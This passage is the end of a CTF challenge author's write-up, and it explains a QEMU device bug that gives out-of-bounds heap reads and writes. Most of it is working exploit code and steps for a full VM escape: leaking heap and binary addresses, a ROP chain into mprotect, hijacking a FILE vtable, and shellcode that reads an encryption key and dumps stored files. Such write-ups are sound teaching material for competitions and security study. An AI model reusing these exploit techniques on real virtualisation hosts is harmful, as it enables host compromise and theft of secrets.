case GATEKEEPER_REG_LENDW:

s->len_dw = val;

break;

case GATEKEEPER_REG_FILEDW:

if (s->file_pos < s->len_dw * 4) {

s->file_dw = val;

memcpy(&s->file_buffer[s->file_pos], (uint8_t *)&val, 4);

s->file_pos += 4;

}

break;

Set LENDW to something huge, then keep writing to FILEDW: you overflow file_buffer and corrupt adjacent memory in the GatekeeperDeviceState struct, which lives on the QEMU heap.

Same thing works for reads:

static uint64_t gatekeeper_device_read(

void *opaque, hwaddr addr, unsigned size)

{

GatekeeperDeviceState *s = opaque;

uint64_t val = 0;

switch (addr) {

...

case GATEKEEPER_REG_FILEDW:

if (s->file_pos < s->len_dw * 4) {

memcpy((uint8_t *)&val, &s->file_buffer[s->file_pos], 4);

s->file_pos += 4;

}

So you get both OOB read and write on the QEMU heap.
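
A toy model makes the missing bound obvious. `ToyDevice`, its 0x40-byte buffer and the marker bytes placed after it are all hypothetical (the real buffer size and neighbouring fields are not shown here); only the `file_pos < len_dw * 4` check is taken from the device code above.

```python
class ToyDevice:
    BUF_SIZE = 0x40  # hypothetical size of file_buffer

    def __init__(self) -> None:
        # One flat allocation: file_buffer followed by unrelated "adjacent" state.
        self.heap = bytearray(self.BUF_SIZE) + bytearray(b"ADJACENT-STATE!!")
        self.len_dw = 0
        self.file_pos = 0

    def write_lendw(self, val: int) -> None:
        self.len_dw = val  # never capped against BUF_SIZE

    def write_filedw(self, val: int) -> None:
        if self.file_pos < self.len_dw * 4:  # same check as the device
            dw = (val & 0xFFFFFFFF).to_bytes(4, "little")
            self.heap[self.file_pos:self.file_pos + 4] = dw
            self.file_pos += 4


dev = ToyDevice()
dev.write_lendw(0xFFFFFFFF)
for _ in range(ToyDevice.BUF_SIZE // 4 + 1):  # one dword more than fits
    dev.write_filedw(0x41414141)
print(bytes(dev.heap[ToyDevice.BUF_SIZE:]))
```

The final write lands in the bytes after the buffer. The check only compares against a guest-controlled length, so nothing ties `file_pos` to the buffer's real size.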

Exploitation

The exploit uses the mini_printf BOF (vuln 2) to break out of the verifier, then talks directly to the MMIO device. First, it sets LENDW to 0xffffffff and reads 0x1000 bytes past file_buffer to leak heap metadata:

set_total_len_and_reset_position(0xffffffff);

read_mem_chunk(data, 0x1000);

const uint64_t qemu_base = *(uint64_t*)&data[0x90c] - 0x53f0d0;

const uint64_t s_file_buffer = *(uint64_t*)&data[0x994] + 0x59c;

From the leaked pointers we recover the QEMU binary base (for ROP gadgets) and the address of file_buffer itself (for placing payloads). The exploit then writes a two-part payload into file_buffer:

- Shellcode (first 0x700 bytes): a position-independent x86-64 binary compiled from a standalone C file.

- ROP chain (right after): pop rdi; pop rsi; pop rdx; ret into mprotect(shellcode_page, 0x10000, RWX), then jump to the shellcode.

for (uint32_t i = 0; i < 0x700 / 4; ++i) {

uint32_t dw = *(uint32_t*)&qemu_escape_shellcode_bin[i * 4];

_mmio_write_dw(MMIO_BASE, REG_FILEDW, dw);

}

WRITE_QW(pop_rdi_ret);

WRITE_QW(shellcode_location & 0xFFFFFFFFFFFFF000ull);

WRITE_QW(pop_rsi_ret);

WRITE_QW(0x10000);

WRITE_QW(pop_rdx_ret);

WRITE_QW(0x7); // PROT_READ | PROT_WRITE | PROT_EXEC

WRITE_QW(mprotect);

WRITE_QW(shellcode_location);

A fake vtable entry is placed at a known offset, containing a push rcx; pop rsp; ret stack pivot gadget.

Next, the exploit scans the OOB region for a FILE structure (signature 0xfbad0000), advances to its vtable pointer at offset +0xd8, and overwrites it to point at the fake vtable:

for (;;) {

uint64_t qw = READ_QW();

if ((qw & 0xFFFFFFFFFFFF0000ull) == 0x00000000fbad0000ull) {

break;

}

}

// Advance to vtable pointer at +0xd8

for (uint32_t i = 0; i < 0xd8 - 8; i += 8) {

READ_QW();

}

WRITE_QW(fake_io_vtable);

When QEMU next calls any IO operation on that FILE (e.g., fflush at exit), it dispatches through the corrupted vtable, hits the stack pivot gadget, lands on the ROP chain, calls mprotect, and jumps to the shellcode.
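
The scan itself is simple enough to prototype offline against a leaked dump. A sketch, assuming the dump is walked in 8-byte steps like the exploit's READ_QW loop; `find_file_vtable_offset` and the sample blob (including the 0xfbad2887 flags value) are fabricated for illustration.

```python
import struct


def find_file_vtable_offset(leak: bytes):
    """Offset of the vtable pointer of the first FILE-like struct, or None."""
    for off in range(0, len(leak) - 7, 8):
        (qw,) = struct.unpack_from("<Q", leak, off)
        # Same test as the exploit: the low 16 bits are ignored, the rest
        # must equal the 0xfbad0000 signature.
        if qw & 0xFFFFFFFFFFFF0000 == 0x00000000FBAD0000:
            return off + 0xD8
    return None


# Fabricated dump: padding, one qword carrying the signature, more padding.
leak = bytes(0x20) + struct.pack("<Q", 0xFBAD2887) + bytes(0x100)
print(hex(find_file_vtable_offset(leak)))
```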

The Shellcode

The shellcode itself is a standalone x86-64 C program compiled into a flat binary. It sets up its own stack (using rdi passed from the ROP chain), then:

- Reads the AES-128-GCM encryption key from /var/gatekeeper/executor/enc_key.bin and prints it as hex.

- Enumerates all files under /var/gatekeeper/executor/files/ using getdents64.

- Reads each file and dumps plaintext contents to stdout.

void shellcode_main(void)

{

// Leak encryption key

uint8_t enc_key[16];

size_t key_len = sizeof(enc_key);

if (read_file(enc_key_path, enc_key, &key_len) == 0) {

char hexkey[33];

hex_encode(enc_key, key_len, hexkey, 0);

write_buf("Gatekeeper Encryption Key: ", 27);

write_buf(hexkey, my_strlen(hexkey));

write_buf("\n", 1);

}

// Enumerate and dump all stored files

long fd = syscall3(SYS_open, (long)path, 0, 0);

...

}

With the encryption key leaked, the attacker can decrypt all AES-GCM encrypted flags offline. Combined with the plaintext file dumps, this gives access to every flag on the service. Full host compromise.

Full exploit: exploit-qemu-escape.py, qemu-escape-main.c, qemu-escape-shellcode.c

In the end, I’d like to say that building Gatekeeper was a pretty fun experience. I really enjoyed it, especially the memory modelling part of the verifier. Also, during the CTF all the intended bugs were actually found and exploited (although the QEMU escape was only found in the last hour), which is always a nice feeling as a challenge author :) So thanks to all the participants, and see you next year at the SASCTF 2026 Finals!

That’s it! All source code and exploits: Team-Drovosec/sasctf-finals-2025. Hope it was an interesting read!